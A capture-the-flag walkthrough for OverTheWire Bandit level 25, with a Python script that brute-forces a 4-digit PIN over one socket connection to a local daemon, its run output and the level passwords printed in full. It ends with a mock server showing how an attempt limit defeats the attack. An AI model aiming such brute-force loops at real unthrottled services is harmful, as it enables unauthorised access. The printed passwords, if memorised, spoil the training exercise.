OverTheWire - Bandit: Level 25 to Level 26
Now something new comes into play: brute-forcing.
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time.
First, let's check how the interaction with port 30002 works by connecting to the port and trying it out.
```
$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
$ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 1234
Wrong! Please enter the correct pincode. Try again.
$ VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999
Wrong! Please enter the correct pincode. Try again.
```
Since python3 is installed and usable, we can write a small Python script that connects to the port and brute-forces the pin over a single connection.
```python
import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as con:
    con.connect(('127.0.0.1', 30002))
    # Receive (and discard) the welcome message
    msg = con.recv(255).decode()
    for pin in range(0, 10000):
        # For some monitoring, print a message every 500 pins
        if pin % 500 == 0:
            print(f"reached pin {pin:04d}")
        # Prepare the brute-force line: the pin, a plain integer,
        # is zero-padded to match the expected 4-digit format
        to_send = f"VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar {pin:04d}\n"
        con.sendall(to_send.encode())
        # About 250 bytes should be enough to receive at once
        msg = con.recv(250).decode()
        # Since we do not yet know what the message looks like
        # on success, we simply check for the failure message.
        # If it is not received, we assume success.
        if "Wrong!" not in msg:
            print(to_send)
            print("leads to:")
            print(msg)
            break
```
Again, we create a temporary file under /tmp/ to store the script and then execute it. This takes some time, so one can grab some coffee and cake.
```
$ python3 /tmp/shoujin24.py
reached pin 0000
reached pin 0500
reached pin 1000
reached pin 1500
reached pin 2000
reached pin 2500
reached pin 3000
reached pin 3500
reached pin 4000
reached pin 4500
reached pin 5000
reached pin 5500
reached pin 6000
reached pin 6500
reached pin 7000
reached pin 7500
reached pin 8000
reached pin 8500
reached pin 9000
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9015

leads to:
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d

Exiting.
```
There it is! The pin is 9015 and the password of bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d.
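To see why the level is solvable at all, it helps to run the dialogue above end to end offline: a tiny mock of the pincode checker on one side and a line-oriented client on the other. This is an added example, not the walkthrough's script and not OverTheWire's daemon; the password, pin and port are constructed stand-ins (the mock binds to a free local port instead of 30002). It also goes one step beyond the level: the mock takes a hypothetical `max_attempts` argument that closes the connection after a few wrong guesses, which is exactly the throttling the real checker lacks and the reason 10000 guesses over one connection succeed. The client reads replies line by line instead of a fixed-size `recv()`, so a verdict split across TCP segments cannot be misread as "not Wrong".

```python
import socket
import threading

# Constructed values for this stand-alone example, not the real level's secrets.
PASSWORD = "EXAMPLE_PASSWORD_FOR_BANDIT24"
SECRET_PIN = "9015"

WELCOME = ("I am the pincode checker for user bandit25. Please enter the password "
           "for user bandit24 and the secret pincode on a single line, separated by a space.\n")
WRONG = "Wrong! Please enter the correct pincode. Try again.\n"
CORRECT = "Correct!\nThe password of user bandit25 is EXAMPLE_PASSWORD_FOR_BANDIT25\n\nExiting.\n"


def mock_checker(password, pin, max_attempts=None):
    """Start a mock checker daemon on 127.0.0.1 and return (port, thread).

    It mimics the observed dialogue: one welcome line, then one verdict line per
    submitted "<password> <pin>" line on the same connection.  max_attempts is a
    hypothetical defence: after that many wrong guesses the connection is closed.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn, conn.makefile("r", encoding="utf-8") as lines:
            conn.sendall(WELCOME.encode())
            wrong = 0
            for line in lines:           # one guess per line, like the real daemon
                parts = line.strip().split(" ")
                if len(parts) == 2 and parts[0] == password and parts[1] == pin:
                    conn.sendall(CORRECT.encode())
                    break
                conn.sendall(WRONG.encode())
                wrong += 1
                if max_attempts is not None and wrong >= max_attempts:
                    break                # lockout: drop the connection
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return srv.getsockname()[1], t


def brute_force(host, port, password, pins=range(10000)):
    """Submit every pin in `pins` over one connection.

    Returns (pin, full_reply) on success, or None if the server never answered
    with something other than the failure line (e.g. it closed the connection).
    """
    with socket.create_connection((host, port)) as con, \
            con.makefile("r", encoding="utf-8") as lines:
        lines.readline()                 # welcome banner
        for pin in pins:
            try:
                con.sendall(f"{password} {pin:04d}\n".encode())
                reply = lines.readline()
            except OSError:              # reset by a server that locked us out
                return None
            if reply == "":              # orderly close without a verdict
                return None
            if not reply.startswith("Wrong!"):
                rest = lines.read()      # remainder of the success message
                return f"{pin:04d}", reply + rest
    return None


if __name__ == "__main__":
    port, t = mock_checker(PASSWORD, SECRET_PIN)
    print(brute_force("127.0.0.1", port, PASSWORD))
    t.join(5)
    port, t = mock_checker(PASSWORD, SECRET_PIN, max_attempts=5)
    print(brute_force("127.0.0.1", port, PASSWORD))   # lockout: None
    t.join(5)
```

Against the unthrottled mock the client finds the pin exactly as the walkthrough's script does; against the mock with `max_attempts=5` it gets five "Wrong!" lines and then a closed socket, so the same 10000-guess loop never reaches the pin. That contrast is the point a defender takes from this level: an unauthenticated check with no attempt limit and no per-attempt delay turns a 4-digit secret into a few seconds of work.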